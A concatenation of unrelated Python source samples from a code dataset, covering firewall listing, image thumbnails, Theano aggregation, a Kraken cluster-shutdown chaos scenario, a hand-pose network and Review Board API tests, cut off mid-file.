emsg = 'Aborted: Configuration problem: {0}'.format(str(e))
log.critical(emsg)
sys.exit(1)
# allow change of config file
if args.config:
file = Path(args.config)
if file.is_file():
cf.set_ini_value_with_section('Locations', 'ini_file', str(file))
else:
cf.set_logger(logprint=False)
log.critical('Aborted: Cannot find config file: %s', args.config)
sys.exit(1)
# Load the ini file if there is one
# options can set new values into the ini setup
# to override
try:
cf.readini()
except AssertionError as e:
cf.set_logger(logprint=False)
emsg = 'Aborted: {0}'.format(str(e))
log.critical(emsg)
sys.exit(1)
if args.quiet:
cf.set_logger(logprint=False)
if args.verbose:
cf.set_logger(loglevel='DEBUG')
try:
cf.setup()
except AssertionError as e:
emsg = 'Aborted: Configuration problem: {0}'.format(str(e))
log.critical(emsg)
sys.exit(1)
orderby = 'last DESC'
if args.reverse:
orderby = 'last'
if args.matchcount:
orderby = 'matchcount DESC, incidents'
if args.reverse:
orderby = 'matchcount, incidents'
if args.incidents:
orderby = 'incidents DESC, matchcount'
if args.reverse:
orderby = 'incidents, matchcount'
if args.pattern_split:
for v in args.pattern_split:
if v == 'yes':
cf.pattern_split = True
elif v == 'no':
cf.pattern_split = False
else:
log.error('Value for -p should be "yes" or "no"')
sys.exit(0)
config = cf.get_ini_values_by_section('Nftfwls')
cf.date_fmt = config['date_fmt']
cf.pattern_split = config['pattern_split']
db = loaddb(cf, orderby=orderby)
if not args.all:
fw = loadactive(cf)
db = activedb(db, fw)
if args.web:
displayhtml(cf, db)
else:
displaytable(cf, db, args.noborder)
if __name__ == '__main__':
main()
|
StarcoderdataPython
|
3503773
|
from PIL import Image, ImageFont, ImageDraw
def thumbnail(input_file_addr, size=(128, 128)):
"""
Create thumbnail for figure
Parameters
----------
input_file_addr: Path to the input image file
size: The size of the thumbnail (default: (128, 128))
Returns
-------
image object
"""
image = Image.open(input_file_addr)
image.thumbnail(size)
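# Note: PIL's thumbnail() resizes the image in place and preserves the aspect
# ratio, so the result may be smaller than `size` in one dimension.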
return image
if __name__ == "__main__":
thumbnail("/home/caesar/Desktop/1.jpg").show()
|
StarcoderdataPython
|
6564956
|
"""Evaluate Theano variables on auxiliary data and during training."""
import logging
from abc import ABCMeta, abstractmethod
from six import add_metaclass
from theano import tensor
from theano.ifelse import ifelse
from blocks.utils import shared_like
logger = logging.getLogger(__name__)
@add_metaclass(ABCMeta)
class AggregationScheme(object):
"""How to incrementally evaluate a Theano variable over minibatches.
An AggregationScheme allocates :class:`Aggregator` that can
incrementally compute the value of a Theano variable on a full dataset
by aggregating partial results computed on multiple batches.
The AggregationScheme should be attached via the tag
``aggregation_scheme`` to a Theano variable which computes the desired
value on a single batch.
Parameters
----------
variable: :class:`~tensor.TensorVariable`
The variable that holds the desired value on a single batch.
"""
@abstractmethod
def get_aggregator(self):
"""Return a new Aggregator for this variable."""
pass
class Aggregator(object):
"""An Aggregator incrementally evaluates a Theano variable on a dataset.
.. warning::
The Aggregators should never be created directly. Instead use the
:meth:`AggregationScheme.get_aggregator` method.
Example usages are:
* compute the mean of some value over examples, sequence lengths etc.
* track a parameter of a model
* monitor a penalty
The Aggregator maintains a set of Theano shared values called
accumulators and specifies how they should be initialized, and
updated with incremental calculations. Finally, it
provides a Theano variable that reads the accumulators
and computes the final value.
Parameters
----------
aggregation_scheme : :class:`AggregationScheme`
The aggregation scheme that constructed this Aggregator
initialization_updates : list of Theano updates
Updates that specify how to initialize shared variables of
this Aggregator. *Can only refer to shared variables and
constants.*
accumulation_updates : list of Theano updates
Updates that specify how a new batch of data gets processed
by this Aggregator. *Can refer to model inputs.*
readout_variable : :class:`~tensor.TensorVariable`
Theano variable that holds the final value based on accumulated
partial results. *readout_variable must only consist of shared
variables and constants.*
Attributes
----------
All constructor parameters are accessible as attributes.
"""
def __init__(self, aggregation_scheme, initialization_updates=None,
accumulation_updates=None, readout_variable=None):
self.aggregation_scheme = aggregation_scheme
self.readout_variable = readout_variable
if initialization_updates is None:
initialization_updates = []
if accumulation_updates is None:
accumulation_updates = []
self.initialization_updates = initialization_updates
self.accumulation_updates = accumulation_updates
class Mean(AggregationScheme):
"""Aggregation scheme which computes the mean.
Parameters
----------
numerator : :class:`~tensor.TensorVariable`
Theano variable for the numerator e.g. the likelihood
denominator : :class:`~tensor.TensorVariable`
Theano variable for the denominator e.g. the batch size
"""
def __init__(self, numerator, denominator):
self.numerator = numerator
self.denominator = denominator
def get_aggregator(self):
initialized = shared_like(0.)
numerator_acc = shared_like(self.numerator)
denominator_acc = shared_like(self.denominator)
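# 'initialized' acts as a flag: via ifelse() below, the first accumulation after
# initialization overwrites the accumulators instead of adding to stale values.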
conditional_update_num = ifelse(initialized,
self.numerator + numerator_acc,
self.numerator)
conditional_update_den = ifelse(initialized,
self.denominator + denominator_acc,
self.denominator)
initialization_updates = [(numerator_acc,
tensor.zeros_like(numerator_acc)),
(denominator_acc,
tensor.zeros_like(denominator_acc)),
(initialized, 0.)]
accumulation_updates = [(numerator_acc,
conditional_update_num),
(denominator_acc,
conditional_update_den),
(initialized, 1.)]
aggregator = Aggregator(aggregation_scheme=self,
initialization_updates=initialization_updates,
accumulation_updates=accumulation_updates,
readout_variable=(numerator_acc /
denominator_acc))
return aggregator
def mean(numerator, denominator=1.):
"""Mean of quantity (numerator) over a number (denominator) values."""
variable = numerator / denominator
variable.tag.aggregation_scheme = Mean(numerator, denominator)
variable.name = numerator.name
return variable
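# Illustrative usage note (not part of the original module): given per-batch Theano
# variables ``total_cost`` and ``batch_size``, ``mean(total_cost, batch_size)`` returns
# a variable tagged with a Mean scheme, which the monitoring machinery can then
# aggregate into a dataset-wide average.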
class _DataIndependent(AggregationScheme):
"""Dummy aggregation scheme for values that don't depend on data."""
def __init__(self, variable):
self.variable = variable
def get_aggregator(self):
return Aggregator(aggregation_scheme=self,
initialization_updates=[],
accumulation_updates=[],
readout_variable=self.variable)
class TakeLast(AggregationScheme):
"""Aggregation scheme which remembers only the last value."""
def __init__(self, variable):
self.variable = variable
def get_aggregator(self):
self.storage = shared_like(self.variable)
return Aggregator(aggregation_scheme=self,
initialization_updates=[
(self.storage, tensor.zeros_like(self.storage))],
accumulation_updates=[(self.storage, self.variable)],
readout_variable=self.storage)
@add_metaclass(ABCMeta)
class MonitoredQuantity(object):
"""The base class for monitored-quantities.
To monitor a non-Theano quantity in Blocks you have to implement this
interface for it. The initialize method initializes accumulators and
the parameters needed to compute this quantity, accumulate method
accumulates results for every batch, and finally readout is called
to get the accumulated results.
Attributes
----------
requires : list
List of Theano variables needed to calculate this quantity.
name : str
The name of monitored quantity which appears in the log.
See Also
--------
:class:`~blocks.monitoring.evaluators.DatasetEvaluator`
:class:`~blocks.extensions.DataStreamMonitoring`
"""
def __init__(self, requires=None, name=None):
if requires is None:
requires = []
self.requires = requires
self.name = name
@abstractmethod
def initialize(self):
"""Initialize accumulators for this monitored quantity."""
pass
@abstractmethod
def accumulate(self):
"""Accumulate results for every batch."""
pass
@abstractmethod
def readout(self):
"""Readout the accumulated results to capture the final result."""
pass
|
StarcoderdataPython
|
6625388
|
<gh_stars>0
#!/usr/bin/env python
# @license
# Copyright 2020 <NAME> - All Rights Reserved.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os, glob
import json
path = "./assets/env/"
files = {}
paths = glob.glob(path + "**/*.hdr", recursive=True)
paths.sort()
for f in paths:
n = os.path.splitext(os.path.basename(f))[0]
files[n] = f
data_str = json.dumps(files, indent=4)
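# data_str now maps base names to paths, e.g. (illustrative entry only):
#   { "studio_small_03": "./assets/env/studio_small_03.hdr" }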
data_str = data_str.replace('\\\\', '/')
print(data_str)
with open(path + 'ibl_index.js', 'w') as outfile:
outfile.write("var ibl_index = ");
outfile.write(data_str)
outfile.write(";\n\n")
outfile.write("export default ibl_index;\n")
|
StarcoderdataPython
|
12840413
|
#!/usr/bin/env python
import sys
import yaml
import logging
import time
from multiprocessing.pool import ThreadPool
import kraken.cerberus.setup as cerberus
import kraken.kubernetes.client as kubecli
import kraken.post_actions.actions as post_actions
from kraken.node_actions.aws_node_scenarios import AWS
from kraken.node_actions.openstack_node_scenarios import OPENSTACKCLOUD
from kraken.node_actions.az_node_scenarios import Azure
from kraken.node_actions.gcp_node_scenarios import GCP
def multiprocess_nodes(cloud_object_function, nodes):
try:
# Thread pool sized to the number of nodes so all operations run concurrently
pool = ThreadPool(processes=len(nodes))
logging.info("nodes type " + str(type(nodes[0])))
if type(nodes[0]) is tuple:
node_id = []
node_info = []
for node in nodes:
node_id.append(node[0])
node_info.append(node[1])
logging.info("node id " + str(node_id))
logging.info("node info" + str(node_info))
pool.starmap(cloud_object_function, zip(node_info, node_id))
else:
logging.info("pool type" + str(type(nodes)))
pool.map(cloud_object_function, nodes)
pool.close()
except Exception as e:
logging.info("Error on pool multiprocessing: " + str(e))
# Inject the cluster shut down scenario
def cluster_shut_down(shut_down_config):
runs = shut_down_config["runs"]
shut_down_duration = shut_down_config["shut_down_duration"]
cloud_type = shut_down_config["cloud_type"]
timeout = shut_down_config["timeout"]
if cloud_type.lower() == "aws":
cloud_object = AWS()
elif cloud_type.lower() == "gcp":
cloud_object = GCP()
elif cloud_type.lower() == "openstack":
cloud_object = OPENSTACKCLOUD()
elif cloud_type.lower() in ["azure", "az"]:
cloud_object = Azure()
else:
logging.error("Cloud type " + cloud_type + " is not currently supported for cluster shut down")
sys.exit(1)
nodes = kubecli.list_nodes()
node_id = []
for node in nodes:
instance_id = cloud_object.get_instance_id(node)
node_id.append(instance_id)
logging.info("node id list " + str(node_id))
for _ in range(runs):
logging.info("Starting cluster_shut_down scenario injection")
stopping_nodes = set(node_id)
multiprocess_nodes(cloud_object.stop_instances, node_id)
stopped_nodes = stopping_nodes.copy()
while len(stopping_nodes) > 0:
for node in stopping_nodes:
if type(node) is tuple:
node_status = cloud_object.wait_until_stopped(node[1], node[0], timeout)
else:
node_status = cloud_object.wait_until_stopped(node, timeout)
# Only want to remove node from stopping list when fully stopped/no error
if node_status:
stopped_nodes.remove(node)
stopping_nodes = stopped_nodes.copy()
logging.info("Shutting down the cluster for the specified duration: %s" % (shut_down_duration))
time.sleep(shut_down_duration)
logging.info("Restarting the nodes")
restarted_nodes = set(node_id)
multiprocess_nodes(cloud_object.start_instances, node_id)
logging.info("Wait for each node to be running again")
not_running_nodes = restarted_nodes.copy()
while len(not_running_nodes) > 0:
for node in not_running_nodes:
if type(node) is tuple:
node_status = cloud_object.wait_until_running(node[1], node[0], timeout)
else:
node_status = cloud_object.wait_until_running(node, timeout)
if node_status:
restarted_nodes.remove(node)
not_running_nodes = restarted_nodes.copy()
logging.info("Waiting for 150s to allow cluster component initialization")
time.sleep(150)
logging.info("Successfully injected cluster_shut_down scenario!")
def run(scenarios_list, config, wait_duration):
failed_post_scenarios = []
for shut_down_config in scenarios_list:
if len(shut_down_config) > 1:
pre_action_output = post_actions.run("", shut_down_config[1])
else:
pre_action_output = ""
with open(shut_down_config[0], "r") as f:
shut_down_config_yaml = yaml.full_load(f)
shut_down_config_scenario = shut_down_config_yaml["cluster_shut_down_scenario"]
start_time = int(time.time())
cluster_shut_down(shut_down_config_scenario)
logging.info("Waiting for the specified duration: %s" % (wait_duration))
time.sleep(wait_duration)
failed_post_scenarios = post_actions.check_recovery(
"", shut_down_config, failed_post_scenarios, pre_action_output
)
end_time = int(time.time())
cerberus.publish_kraken_status(config, failed_post_scenarios, start_time, end_time)
|
StarcoderdataPython
|
3421552
|
import numpy as np
import tensorflow as tf
from tensorflow.keras import Model
from tensorflow.keras.layers import BatchNormalization, Conv2D, Dense, Input, MaxPooling2D, ReLU, UpSampling2D
from src.utils.imaging import resize_bilinear_nearest_batch
class ResnetBlock(tf.keras.layers.Layer):
def __init__(self, kernel_size, filters):
super(ResnetBlock, self).__init__(name='')
self.kernel_size = kernel_size
self.filters = filters
half_filters = int(filters // 2)
self.conv2d_1 = conv(half_filters, (1, 1))
self.bn_1 = bn()
self.conv2d_2 = conv(half_filters, kernel_size, padding='same')
self.bn_2 = bn()
self.conv2d_3 = conv(filters, (1, 1))
self.bn_3 = bn()
self.conv2d_4 = conv(filters, (1, 1))
self.bn_4 = bn()
def get_config(self):
config = super().get_config().copy()
config.update({
'kernel_size': self.kernel_size,
'filters': self.filters,
})
return config
def call(self, input, training=False):
x = self.conv2d_1(input)
x = self.bn_1(x, training=training)
x = tf.nn.relu(x)
x = self.conv2d_2(x)
x = self.bn_2(x, training=training)
x = tf.nn.relu(x)
x = self.conv2d_3(x)
x = self.bn_3(x, training=training)
if input.shape[-1] != self.filters:
input = self.conv2d_4(input)
input = self.bn_4(input, training=training)
x += input
return tf.nn.relu(x)
def conv(filters, kernel_size, strides=(1, 1), padding='valid', use_bias=True):
initializer = tf.keras.initializers.TruncatedNormal(0.0, 0.01)
regularizer = tf.keras.regularizers.L1L2(l2=0.00005)
return Conv2D(filters, kernel_size, strides=strides, padding=padding, kernel_initializer=initializer,
kernel_regularizer=regularizer, use_bias=use_bias)
def bn():
initializer = tf.keras.initializers.TruncatedNormal(1.0, 0.01)
regularizer = tf.keras.regularizers.L1L2(l2=0.00005)
return BatchNormalization(gamma_initializer=initializer, gamma_regularizer=regularizer)
def conv_bn(x, filters, kernel_size, strides=(1, 1), padding='valid'):
x = conv(filters, kernel_size, strides=strides, padding=padding)(x)
x = bn()(x)
return x
def conv_bn_relu(x, filters, kernel_size, strides=(1, 1), padding='valid'):
x = conv(filters, kernel_size, strides=strides, padding=padding)(x)
x = bn()(x)
return ReLU()(x)
class JGR_J2O:
def __init__(self, input_size=96, n_joints=21, n_features=128):
self.input_size = input_size
self.out_size = input_size // 4
self.n_joints = n_joints
self.n_features = n_features
self.A_e = self.connection_weight_matrix()
def connection_weight_matrix(self):
# This is A + I (adjacency matrix + identity matrix):
A = np.array([[1, 1, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0],
[1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0],
[1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0],
[1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1]])
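# Symmetric normalization D^{-1/2} A D^{-1/2} (as used in graph convolutions),
# with the self-loops already included in A above.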
D = np.diag(np.power(np.sum(A, axis=0), -0.5))
A_e = np.dot(np.dot(D, A), D)
A_e = tf.constant(A_e, dtype=tf.float32)
return A_e
def hourglass_module(self, inputs, n, features):
with tf.name_scope(name='hourglass'):
left = MaxPooling2D(pool_size=(2, 2), strides=(2, 2))(inputs)
left = ResnetBlock(kernel_size=(3, 3), filters=features)(left)
top = ResnetBlock(kernel_size=(3, 3), filters=features)(inputs)
if n > 1:
middle = self.hourglass_module(left, n - 1, features)
else:
middle = left
right = ResnetBlock(kernel_size=(3, 3), filters=features)(middle)
right = UpSampling2D(size=(2, 2), interpolation='nearest')(right)
return right + top
def joint_graph_reasoning_module(self, x):
w, F = self.pixel_to_joint_voting(x) # produces joints' features
Fe = self.graph_reasoning(F)
newFe = self.joint_to_pixel_mapping(Fe, w)
# local feature enhancement
x_ = tf.concat([newFe, x], axis=-1)
x_ = conv_bn_relu(x_, self.n_features, (1, 1))
return x_, w
def pixel_to_joint_voting(self, x):
weights = conv(self.n_joints, (1, 1))(x)
weights = self.spatial_softmax(weights) # [-1, N, W * H]
x = conv_bn_relu(x, x.shape[-1], (1, 1))
x = tf.reshape(x, [-1, x.shape[1] * x.shape[2], x.shape[3]]) # [-1, W * H, features (C)]
F = tf.matmul(weights, x)
w_reshaped = tf.reshape(weights, [-1, self.n_joints, self.out_size, self.out_size])
return w_reshaped, F
def graph_reasoning(self, F):
"""
Augments joints' feature representations
by computing the following matrix multiplication
F_e = σ(A_e @ F @ W_e), where
A_e is a connection weight matrix defining joint dependencies,
W_e is a trainable transformation matrix,
σ is a nonlinear function.
Parameters
----------
F
Joints' feature representations
Returns
----------
Returns augmented joints' feature representations
of the same shape as F.
"""
# Matrix multiplication through trainable matrix W_e
F_reshaped = tf.reshape(F, [-1, self.n_features])
FWe = Dense(F.shape[-1], use_bias=False)(F_reshaped)
FWe = tf.reshape(FWe, [-1, self.n_joints, self.n_features])
F_augmented = tf.matmul(self.A_e, FWe)
F_augmented = ReLU()(F_augmented)
return F_augmented
def joint_to_pixel_mapping(self, Fe, w):
"""
(-1, 21, 128) -> (-1, 24, 24, 128)
Parameters
----------
Fe
w
Returns
-------
"""
# (-1, 21, 128) -> (-1, 21, 1, 1, 128)
newFe = Fe[:, :, tf.newaxis, tf.newaxis, :]
# (-1, 21, 1, 1, 128) -> (-1, 21, 24, 24, 128)
newFe = tf.tile(newFe, [1, 1, self.out_size, self.out_size, 1])
# (-1, 21, 24, 24, 128) -> (-1, 24, 24, 128)
newFe = newFe * w[..., tf.newaxis] # (-1, 21, 24, 24, 128)
newFe = tf.reduce_mean(newFe, axis=1) # finally (-1, 24, 24, 128)
newFe = conv_bn_relu(newFe, self.n_features, kernel_size=(1, 1))
return newFe
def spatial_softmax(self, features):
"""
Computes the softmax function for a four-dimensional array.
Parameters
----------
features
Features has a shape (batch_size, height, width, channels).
"""
_, H, W, C = features.shape
features = tf.reshape(features, [-1, H * W, C])
features = tf.transpose(features, [0, 2, 1])
# features = tf.reshape(tf.transpose(features, [0, 3, 1, 2]), [B * C, H * W])
softmax = tf.nn.softmax(features, axis=1)
# softmax = tf.reshape(softmax, [B, C, H, W])
# softmax = tf.transpose(tf.reshape(softmax, [B, C, H, W]), [0, 2, 3, 1])
return softmax
def pixel_to_offset_module(self, x):
u_offsets = conv(self.n_joints, kernel_size=(1, 1), strides=(1, 1), use_bias=False)(x)
v_offsets = conv(self.n_joints, kernel_size=(1, 1), strides=(1, 1), use_bias=False)(x)
z_offsets = conv(self.n_joints, kernel_size=(1, 1), strides=(1, 1), use_bias=False)(x)
return u_offsets, v_offsets, z_offsets
def graph(self):
input = Input(shape=(self.input_size, self.input_size, 1))
# The following layers precede the hourglass module
# according to Hourglass and JGR-P2O papers
x = conv_bn_relu(input, filters=32, kernel_size=(7, 7), strides=(2, 2), padding='same') # 48, 48, 32
x = ResnetBlock(kernel_size=(3, 3), filters=64)(x)
x = MaxPooling2D(pool_size=(2, 2), strides=(2, 2), padding='same')(x)
x = ResnetBlock(kernel_size=(3, 3), filters=x.shape[-1])(x)
x = ResnetBlock(kernel_size=(3, 3), filters=self.n_features)(x) # 24, 24, hourglass_features
# The number of features stays the same across the whole hourglass module
x = self.hourglass_module(x, n=3, features=x.shape[-1])
x = ResnetBlock(kernel_size=(3, 3), filters=x.shape[-1])(x)
x_jgr, weights = self.joint_graph_reasoning_module(x)
u_offs, v_offs, z_offs = self.pixel_to_offset_module(x_jgr)
offsets = tf.stack([u_offs, v_offs, z_offs], axis=-1, name='offsets')
# offs.shape [-1, 24, 24, 21]
# u_im, v_im, z_im
weights = tf.transpose(weights, [0, 2, 3, 1]) # [-1, 24, 24, 21]
# u_im.shape [-1, 24, 24, 21]
x = tf.range(self.out_size)
y = tf.range(self.out_size)
x, y = tf.meshgrid(x, y)
# expand_dims, cast, and normalize to [0, 1]
u_im = tf.cast(x[:, :, tf.newaxis], tf.float32) / self.out_size
v_im = tf.cast(y[:, :, tf.newaxis], tf.float32) / self.out_size
# Z coordinate is retrieved from the image directly
# (values should be already normalized to [-1, 1]:
# z_im = tf.image.resize(input, [self.out_size, self.out_size],
# method=tf.image.ResizeMethod.BILINEAR)
z_im = resize_bilinear_nearest_batch(input, [self.out_size, self.out_size])
# u, v, z: [-1, 21]
u = tf.reduce_sum(weights * (u_im + u_offs), axis=[1, 2])
v = tf.reduce_sum(weights * (v_im + v_offs), axis=[1, 2])
z = tf.reduce_sum(weights * (z_im + z_offs), axis=[1, 2])
uvz = tf.stack([u, v, z], axis=-1, name='joints')
return Model(input, outputs=[uvz, offsets])
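if __name__ == '__main__':
    # Minimal construction sketch (added for illustration; it assumes the repository's
    # resize helper imported above accepts the symbolic Keras input used in graph()).
    model = JGR_J2O(input_size=96, n_joints=21, n_features=128).graph()
    model.summary()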
|
StarcoderdataPython
|
3231612
|
from __future__ import print_function, unicode_literals
from django.contrib import auth
from django.contrib.auth.models import Permission, User
from django.core import mail
from djblets.features.testing import override_feature_check
from djblets.testing.decorators import add_fixtures
from djblets.webapi.errors import INVALID_FORM_DATA, PERMISSION_DENIED
from djblets.webapi.testing.decorators import webapi_test_template
from kgb import SpyAgency
from reviewboard.accounts.backends import AuthBackend, StandardAuthBackend
from reviewboard.accounts.models import LocalSiteProfile
from reviewboard.changedescs.models import ChangeDescription
from reviewboard.diffviewer.features import dvcs_feature
from reviewboard.reviews.fields import (BaseEditableField,
BaseTextAreaField,
BaseReviewRequestField,
get_review_request_fieldset)
from reviewboard.reviews.models import ReviewRequest, ReviewRequestDraft
from reviewboard.reviews.signals import (review_request_published,
review_request_publishing)
from reviewboard.webapi.errors import (COMMIT_ID_ALREADY_EXISTS,
NOTHING_TO_PUBLISH,
PUBLISH_ERROR)
from reviewboard.webapi.resources import resources
from reviewboard.webapi.tests.base import BaseWebAPITestCase
from reviewboard.webapi.tests.mimetypes import \
review_request_draft_item_mimetype
from reviewboard.webapi.tests.mixins import BasicTestsMetaclass
from reviewboard.webapi.tests.mixins_extra_data import (ExtraDataItemMixin,
ExtraDataListMixin)
from reviewboard.webapi.tests.urls import get_review_request_draft_url
class ResourceTests(SpyAgency, ExtraDataListMixin, ExtraDataItemMixin,
BaseWebAPITestCase, metaclass=BasicTestsMetaclass):
"""Testing the ReviewRequestDraftResource API tests."""
fixtures = ['test_users']
sample_api_url = 'review-requests/<id>/draft/'
resource = resources.review_request_draft
def compare_item(self, item_rsp, draft):
changedesc = draft.changedesc
self.assertEqual(item_rsp['description'], draft.description)
self.assertEqual(item_rsp['testing_done'], draft.testing_done)
self.assertEqual(item_rsp['extra_data'],
self.resource.serialize_extra_data_field(draft))
self.assertEqual(item_rsp['changedescription'], changedesc.text)
if changedesc.rich_text:
self.assertEqual(item_rsp['changedescription_text_type'],
'markdown')
else:
self.assertEqual(item_rsp['changedescription_text_type'],
'plain')
if draft.description_rich_text:
self.assertEqual(item_rsp['description_text_type'], 'markdown')
else:
self.assertEqual(item_rsp['description_text_type'], 'plain')
if draft.testing_done_rich_text:
self.assertEqual(item_rsp['testing_done_text_type'], 'markdown')
else:
self.assertEqual(item_rsp['testing_done_text_type'], 'plain')
#
# HTTP DELETE tests
#
def setup_basic_delete_test(self, user, with_local_site, local_site_name):
review_request = self.create_review_request(
with_local_site=with_local_site,
submitter=user,
publish=True)
ReviewRequestDraft.create(review_request)
return (get_review_request_draft_url(review_request, local_site_name),
[review_request])
def check_delete_result(self, user, review_request):
self.assertIsNone(review_request.get_draft())
#
# HTTP GET tests
#
def setup_basic_get_test(self, user, with_local_site, local_site_name):
review_request = self.create_review_request(
with_local_site=with_local_site,
submitter=user,
publish=True)
draft = ReviewRequestDraft.create(review_request)
return (get_review_request_draft_url(review_request, local_site_name),
review_request_draft_item_mimetype,
draft)
def test_get_with_markdown_and_force_text_type_markdown(self):
"""Testing the GET review-requests/<id>/draft/ API
with *_text_type=markdown and ?force-text-type=markdown
"""
self._test_get_with_force_text_type(
text=r'\# `This` is a **test**',
rich_text=True,
force_text_type='markdown',
expected_text=r'\# `This` is a **test**')
def test_get_with_markdown_and_force_text_type_plain(self):
"""Testing the GET review-requests/<id>/draft/ API
with *_text_type=markdown and ?force-text-type=plain
"""
self._test_get_with_force_text_type(
text=r'\# `This` is a **test**',
rich_text=True,
force_text_type='plain',
expected_text='# `This` is a **test**')
def test_get_with_markdown_and_force_text_type_html(self):
"""Testing the GET review-requests/<id>/draft/ API
with *_text_type=markdown and ?force-text-type=html
"""
self._test_get_with_force_text_type(
text=r'\# `This` is a **test**',
rich_text=True,
force_text_type='html',
expected_text='<p># <code>This</code> is a '
'<strong>test</strong></p>')
def test_get_with_plain_and_force_text_type_markdown(self):
"""Testing the GET review-requests/<id>/draft/ API
with *_text_type=plain and ?force-text-type=markdown
"""
self._test_get_with_force_text_type(
text='#<`This` is a **test**>',
rich_text=False,
force_text_type='markdown',
expected_text=r'\#<\`This\` is a \*\*test\*\*>')
def test_get_with_plain_and_force_text_type_plain(self):
"""Testing the GET review-requests/<id>/draft/ API
with *_text_type=plain and ?force-text-type=plain
"""
self._test_get_with_force_text_type(
text='#<`This` is a **test**>',
rich_text=False,
force_text_type='plain',
expected_text='#<`This` is a **test**>')
def test_get_with_plain_and_force_text_type_html(self):
"""Testing the GET review-requests/<id>/draft/ API
with *_text_type=plain and ?force-text-type=html
"""
self._test_get_with_force_text_type(
text='#<`This` is a **test**>',
rich_text=False,
force_text_type='html',
expected_text='#<`This` is a **test**>')
def test_get_with_markdown_and_force_markdown_and_custom_markdown(self):
"""Testing the GET review-requests/<id>/draft/ API with rich text,
?force-text-type=raw,markdown, and custom field that supports markdown
"""
self._test_get_with_custom_and_force(
source_text=r'\# `This` is a **test**',
rich_text=True,
force_text_type='markdown',
expected_text=r'\# `This` is a **test**',
custom_field_supports_markdown=True)
def test_get_with_markdown_and_force_plain_and_custom_markdown(self):
"""Testing the GET review-requests/<id>/draft/ API with rich text,
?force-text-type=raw,plain, and custom field that supports markdown
"""
self._test_get_with_custom_and_force(
source_text=r'\# `This` is a **test**',
rich_text=True,
force_text_type='plain',
expected_text='# `This` is a **test**',
custom_field_supports_markdown=True)
def test_get_with_markdown_and_force_html_and_custom_markdown(self):
"""Testing the GET review-requests/<id>/draft/ API with rich text,
?force-text-type=raw,html, and custom field that supports markdown
"""
self._test_get_with_custom_and_force(
source_text=r'\# `This` is a **test**',
rich_text=True,
force_text_type='html',
expected_text='<p># <code>This</code> is a '
'<strong>test</strong></p>',
custom_field_supports_markdown=True)
def test_get_with_markdown_and_force_markdown_and_custom_nomarkdown(self):
"""Testing the GET review-requests/<id>/draft/ API with rich text,
?force-text-type=raw,markdown, and custom field that does not support
markdown
"""
self._test_get_with_custom_and_force(
source_text=r'\# `This` is a **test**',
rich_text=True,
force_text_type='markdown',
expected_text=r'\# `This` is a **test**',
custom_field_supports_markdown=False)
def test_get_with_markdown_and_force_plain_and_custom_nomarkdown(self):
"""Testing the GET review-requests/<id>/draft/ API with rich text,
?force-text-type=raw,plain, and custom field that does not support
markdown
"""
self._test_get_with_custom_and_force(
source_text=r'\# `This` is a **test**',
rich_text=True,
force_text_type='plain',
expected_text='# `This` is a **test**',
custom_field_supports_markdown=False)
def test_get_with_markdown_and_force_html_and_custom_nomarkdown(self):
"""Testing the GET review-requests/<id>/draft/ API with rich text,
?force-text-type=raw,html, and custom field that does not support
markdown
"""
self._test_get_with_custom_and_force(
source_text=r'\# `This` is a **test**',
rich_text=True,
force_text_type='html',
expected_text='<p># <code>This</code> is a '
'<strong>test</strong></p>',
custom_field_supports_markdown=False)
def test_get_with_plain_and_force_markdown_and_custom_nomarkdown(self):
"""Testing the GET review-requests/<id>/draft/ API with plain text,
?force-text-type=raw,markdown, and custom field that does not support
markdown
"""
self._test_get_with_custom_and_force(
source_text='#<`This` is a **test**>',
rich_text=False,
force_text_type='markdown',
